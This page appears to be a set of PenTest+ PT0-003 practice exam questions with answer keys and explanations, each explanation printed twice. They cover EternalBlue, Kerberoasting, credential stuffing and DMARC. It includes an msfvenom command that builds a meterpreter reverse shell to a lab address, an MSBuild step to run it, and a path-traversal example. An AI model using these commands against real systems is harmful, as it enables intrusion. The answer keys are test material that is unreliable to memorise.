Practice Free PT0-003 Exam Online Questions
Question #90
During an assessment, a penetration tester sends the following request:
POST /services/v1/users/create HTTP/1.1
Host: target-application.com
Content-Type: application/json
Content-Length: [dynamic]
Authorization: Bearer (FUZZ)
Which of the following attacks is the penetration tester performing?
- A . Directory traversal
- B . API abuse
- C . Server-side request forgery
- D . Privilege escalation
Correct Answer: B
B
Explanation:
This attack attempts to manipulate the API by fuzzing the authorization token (Authorization: Bearer (FUZZ)). This suggests an attempt to bypass authentication or escalate privileges by using an invalid, stolen, or guessed token―a form of API abuse.
Option A (Directory traversal) ❌ :
Involves manipulating file paths (e.g., ../../../etc/passwd), but this attack targets API authentication.
Option B (API abuse) ✅ :
Correct. Fuzzing the authorization token suggests an attempt to bypass authentication or test for weak API security.
Option C (Server-side request forgery – SSRF) ❌ :
SSRF manipulates backend requests to make unauthorized HTTP calls, which is not evident here.
Option D (Privilege escalation) ❌ :
While API abuse may lead to privilege escalation, fuzzing the token alone does not directly escalate privileges.
Reference: CompTIA PenTest+ PT0-003 Official Guide C API Security Testing & Authentication Bypasses
B
Explanation:
This attack attempts to manipulate the API by fuzzing the authorization token (Authorization: Bearer (FUZZ)). This suggests an attempt to bypass authentication or escalate privileges by using an invalid, stolen, or guessed token―a form of API abuse.
Option A (Directory traversal) ❌ :
Involves manipulating file paths (e.g., ../../../etc/passwd), but this attack targets API authentication.
Option B (API abuse) ✅ :
Correct. Fuzzing the authorization token suggests an attempt to bypass authentication or test for weak API security.
Option C (Server-side request forgery – SSRF) ❌ :
SSRF manipulates backend requests to make unauthorized HTTP calls, which is not evident here.
Option D (Privilege escalation) ❌ :
While API abuse may lead to privilege escalation, fuzzing the token alone does not directly escalate privileges.
Reference: CompTIA PenTest+ PT0-003 Official Guide C API Security Testing & Authentication Bypasses
Question #92
A penetration tester completes a scan and sees the following Nmap output on a host:
Nmap scan report for victim (10.10.10.10)
Host is up (0.0001s latency)
PORT STATE SERVICE
161/udp open snmp
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Running Microsoft Windows 7
OS CPE: cpe: /o: microsoft: windows_7: : sp0
The tester wants to obtain shell access.
Which of the following related exploits should the tester try first?
- A . exploit/windows/smb/psexec
- B . exploit/windows/smb/ms08_067_netapi
- C . exploit/windows/smb/ms17_010_eternalblue
- D . auxiliary/scanner/snmp/snmp_login
Correct Answer: C
C
Explanation:
Since the system is running Windows 7 SP0, it is highly likely to be vulnerable to MS17-010 (EternalBlue), a critical SMB vulnerability used for remote code execution (RCE).
Option A (psexec) ❌ : PsExec requires valid credentials, which we do not have yet.
Option B (ms08_067_netapi) ❌ : MS08-067 targets Windows XP/Server 2003, but the system is Windows 7.
Option C (ms17_010_eternalblue) ✅ : Correct.
EternalBlue allows remote exploitation of SMBv1 in Windows 7/Server 2008.
Option D (snmp_login scanner) ❌ : Only checks default SNMP credentials, not an exploit.
Reference: CompTIA PenTest+ PT0-003 Official Guide C SMB Exploitation & EternalBlue
C
Explanation:
Since the system is running Windows 7 SP0, it is highly likely to be vulnerable to MS17-010 (EternalBlue), a critical SMB vulnerability used for remote code execution (RCE).
Option A (psexec) ❌ : PsExec requires valid credentials, which we do not have yet.
Option B (ms08_067_netapi) ❌ : MS08-067 targets Windows XP/Server 2003, but the system is Windows 7.
Option C (ms17_010_eternalblue) ✅ : Correct.
EternalBlue allows remote exploitation of SMBv1 in Windows 7/Server 2008.
Option D (snmp_login scanner) ❌ : Only checks default SNMP credentials, not an exploit.
Reference: CompTIA PenTest+ PT0-003 Official Guide C SMB Exploitation & EternalBlue
Question #93
During a penetration test, a tester captures information about an SPN account.
Which of the following attacks requires this information as a prerequisite to proceed?
- A . Golden Ticket
- B . Kerberoasting
- C . DCShadow
- D . LSASS dumping
Correct Answer: B
B
Explanation:
Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts in a Windows Active Directory environment.
Here’s a detailed explanation:
Understanding SPN Accounts:
SPNs are unique identifiers for services in a network that allows Kerberos to authenticate service accounts. These accounts are often associated with services such as SQL Server, IIS, etc.
Kerberoasting Attack:
Prerequisite: Knowledge of the SPN account.
Process: An attacker requests a service ticket for the SPN account using the Kerberos protocol. The ticket is encrypted with the service account’s NTLM hash. The attacker captures this ticket and attempts to crack the hash offline.
Objective: To obtain the plaintext password of the service account, which can then be used for lateral movement or privilege escalation.
Comparison with Other Attacks:
Golden Ticket: Involves forging Kerberos TGTs using the KRBTGT account hash, requiring domain admin credentials.
DCShadow: Involves manipulating Active Directory data by impersonating a domain controller, typically requiring high privileges.
LSASS Dumping: Involves extracting credentials from the LSASS process on a Windows machine, often requiring local admin privileges.
Kerberoasting specifically requires the SPN account information to proceed, making it the correct answer.
B
Explanation:
Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts in a Windows Active Directory environment.
Here’s a detailed explanation:
Understanding SPN Accounts:
SPNs are unique identifiers for services in a network that allows Kerberos to authenticate service accounts. These accounts are often associated with services such as SQL Server, IIS, etc.
Kerberoasting Attack:
Prerequisite: Knowledge of the SPN account.
Process: An attacker requests a service ticket for the SPN account using the Kerberos protocol. The ticket is encrypted with the service account’s NTLM hash. The attacker captures this ticket and attempts to crack the hash offline.
Objective: To obtain the plaintext password of the service account, which can then be used for lateral movement or privilege escalation.
Comparison with Other Attacks:
Golden Ticket: Involves forging Kerberos TGTs using the KRBTGT account hash, requiring domain admin credentials.
DCShadow: Involves manipulating Active Directory data by impersonating a domain controller, typically requiring high privileges.
LSASS Dumping: Involves extracting credentials from the LSASS process on a Windows machine, often requiring local admin privileges.
Kerberoasting specifically requires the SPN account information to proceed, making it the correct answer.
Question #94
A penetration tester plans to conduct reconnaissance during an engagement using readily available resources.
Which of the following resources would most likely identify hardware and software being utilized by the client?
- A . Cryptographic flaws
- B . Protocol scanning
- C . Cached pages
- D . Job boards
Correct Answer: D
D
Explanation:
To conduct reconnaissance and identify hardware and software used by a client, job boards are an effective resource. Companies often list the technologies they use in job postings to attract qualified candidates. These listings can provide valuable insights into the specific hardware and software platforms the client is utilizing.
Reconnaissance:
This is the first phase in penetration testing, involving gathering as much information as possible about the target.
Reconnaissance can be divided into two types: passive and active. Job boards fall under passive reconnaissance, where the tester gathers information without directly interacting with the target systems.
Job Boards:
Job postings often include detailed descriptions of the technologies and tools used within the company.
For example, a job posting for a network administrator might list specific brands of hardware (like Cisco routers) or software (like VMware).
Examples of Job Boards:
Websites like LinkedIn, Indeed, Glassdoor, and company career pages can be used to find relevant job postings.
These postings might mention operating systems (Windows, Linux), development frameworks (Spring, .NET), databases (Oracle, MySQL), and more.
Pentest
Reference: OSINT (Open Source Intelligence): Using publicly available sources to gather information about a target.
Job boards are a key source of OSINT, providing indirect access to the internal technologies of a company.
This information can be used to tailor subsequent phases of the penetration test, such as vulnerability scanning and exploitation, to the specific technologies identified.
By examining job boards, a penetration tester can gain insights into the hardware and software environments of the target, making this a valuable reconnaissance tool.
D
Explanation:
To conduct reconnaissance and identify hardware and software used by a client, job boards are an effective resource. Companies often list the technologies they use in job postings to attract qualified candidates. These listings can provide valuable insights into the specific hardware and software platforms the client is utilizing.
Reconnaissance:
This is the first phase in penetration testing, involving gathering as much information as possible about the target.
Reconnaissance can be divided into two types: passive and active. Job boards fall under passive reconnaissance, where the tester gathers information without directly interacting with the target systems.
Job Boards:
Job postings often include detailed descriptions of the technologies and tools used within the company.
For example, a job posting for a network administrator might list specific brands of hardware (like Cisco routers) or software (like VMware).
Examples of Job Boards:
Websites like LinkedIn, Indeed, Glassdoor, and company career pages can be used to find relevant job postings.
These postings might mention operating systems (Windows, Linux), development frameworks (Spring, .NET), databases (Oracle, MySQL), and more.
Pentest
Reference: OSINT (Open Source Intelligence): Using publicly available sources to gather information about a target.
Job boards are a key source of OSINT, providing indirect access to the internal technologies of a company.
This information can be used to tailor subsequent phases of the penetration test, such as vulnerability scanning and exploitation, to the specific technologies identified.
By examining job boards, a penetration tester can gain insights into the hardware and software environments of the target, making this a valuable reconnaissance tool.
Question #95
During the reconnaissance phase, a penetration tester collected the following information from the DNS records:
A—–> www
A—–> host
TXT –> vpn.comptia.org
SPF—> ip =2.2.2.2
Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?
- A . MX
- B . SOA
- C . DMARC
- D . CNAME
Correct Answer: C
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto: [email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject). rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering. Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM
checks are rejected outright, significantly reducing the risk of phishing attacks using their domain.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto: [email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject). rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering. Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM
checks are rejected outright, significantly reducing the risk of phishing attacks using their domain.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
Question #96
A penetration tester uses a reverse shell to maintain connectivity to a target network. During the
final phase of the exercise, the penetration tester removes the reverse shell.
Which of the following is an example of these activities?
- A . Removing persistence mechanisms
- B . Uninstalling tools
- C . Preserving artifacts
- D . Reverting configuration changes
Correct Answer: A
A
Explanation:
Comprehensive and Detailed
A reverse shell that is left on a target to maintain access is a form of persistence/backdoor. The action described ― removing the reverse shell at the end of the engagement ― is specifically the removal of a persistence mechanism. Post-engagement cleanup requires removal of any artifacts that provide continued access (web shells, scheduled tasks, reverse shells, cron jobs, created accounts, etc.) so the environment is returned to its pre-test state and to prevent later compromise.
Why not the others:
B (Uninstalling tools): Removing tools is also a cleanup activity, but the question explicitly references removing the reverse shell (persistence).
C (Preserving artifacts): Preserving artifacts is the opposite (saving logs/evidence) for incident
response ― not removing access.
D (Reverting configuration changes): Important, but the best single match for removing a reverse shell is “removing persistence mechanisms.”
PT0-003 mapping: Domain 5 ― post-engagement cleanup and returning environment to baseline.
A
Explanation:
Comprehensive and Detailed
A reverse shell that is left on a target to maintain access is a form of persistence/backdoor. The action described ― removing the reverse shell at the end of the engagement ― is specifically the removal of a persistence mechanism. Post-engagement cleanup requires removal of any artifacts that provide continued access (web shells, scheduled tasks, reverse shells, cron jobs, created accounts, etc.) so the environment is returned to its pre-test state and to prevent later compromise.
Why not the others:
B (Uninstalling tools): Removing tools is also a cleanup activity, but the question explicitly references removing the reverse shell (persistence).
C (Preserving artifacts): Preserving artifacts is the opposite (saving logs/evidence) for incident
response ― not removing access.
D (Reverting configuration changes): Important, but the best single match for removing a reverse shell is “removing persistence mechanisms.”
PT0-003 mapping: Domain 5 ― post-engagement cleanup and returning environment to baseline.
Question #97
A tester plans to perform an attack technique over a compromised host.
The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.
Which of the following commands would most likely be used by the tester to continue with the attack on the host?
- A . regsvr32 /s /n /u C: evil.xml
- B . MSBuild.exe C: evil.xml
- C . mshta.exe C: evil.xml
- D . AppInstaller.exe C: evil.xml
Correct Answer: B
B
Explanation:
The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:
Understanding MSBuild.exe:
Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It’s commonly used to build .NET applications and can also execute code embedded in project files.
Command Usage:
Command: MSBuild.exe C: evil.xml
This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.
Comparison with Other Commands:
regsvr32 /s /n /u C: evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.
mshta.exe C: evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.
AppInstaller.exe C: evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.
Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.
B
Explanation:
The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:
Understanding MSBuild.exe:
Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It’s commonly used to build .NET applications and can also execute code embedded in project files.
Command Usage:
Command: MSBuild.exe C: evil.xml
This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.
Comparison with Other Commands:
regsvr32 /s /n /u C: evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.
mshta.exe C: evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.
AppInstaller.exe C: evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.
Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.
Question #98
A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access.
Which of the following techniques should the tester use?
- A . Credential stuffing
- B . MFA fatigue
- C . Dictionary attack
- D . Brute-force attack
Correct Answer: A
A
Explanation:
To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.
Credential Stuffing:
Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.
Advantages: Unlike brute-force attacks, credential stuffing uses already known credentials, which reduces the number of attempts per account and minimizes the risk of triggering account lockout mechanisms.
Tool: Tools like Sentry MBA, Snipr, and others are commonly used for credential stuffing attacks.
Other Techniques:
MFA Fatigue: A social engineering tactic to exhaust users into accepting multi-factor authentication requests, not applicable for avoiding lockouts in this context.
Dictionary Attack: Similar to brute-force but uses a list of likely passwords; still risks lockout due to multiple attempts.
Brute-force Attack: Systematically attempts all possible password combinations, likely to trigger account lockouts due to high number of failed attempts.
Pentest
Reference: Password Attacks: Understanding different types of password attacks and their implications on account security.
Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.
By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.
A
Explanation:
To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.
Credential Stuffing:
Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.
Advantages: Unlike brute-force attacks, credential stuffing uses already known credentials, which reduces the number of attempts per account and minimizes the risk of triggering account lockout mechanisms.
Tool: Tools like Sentry MBA, Snipr, and others are commonly used for credential stuffing attacks.
Other Techniques:
MFA Fatigue: A social engineering tactic to exhaust users into accepting multi-factor authentication requests, not applicable for avoiding lockouts in this context.
Dictionary Attack: Similar to brute-force but uses a list of likely passwords; still risks lockout due to multiple attempts.
Brute-force Attack: Systematically attempts all possible password combinations, likely to trigger account lockouts due to high number of failed attempts.
Pentest
Reference: Password Attacks: Understanding different types of password attacks and their implications on account security.
Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.
By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.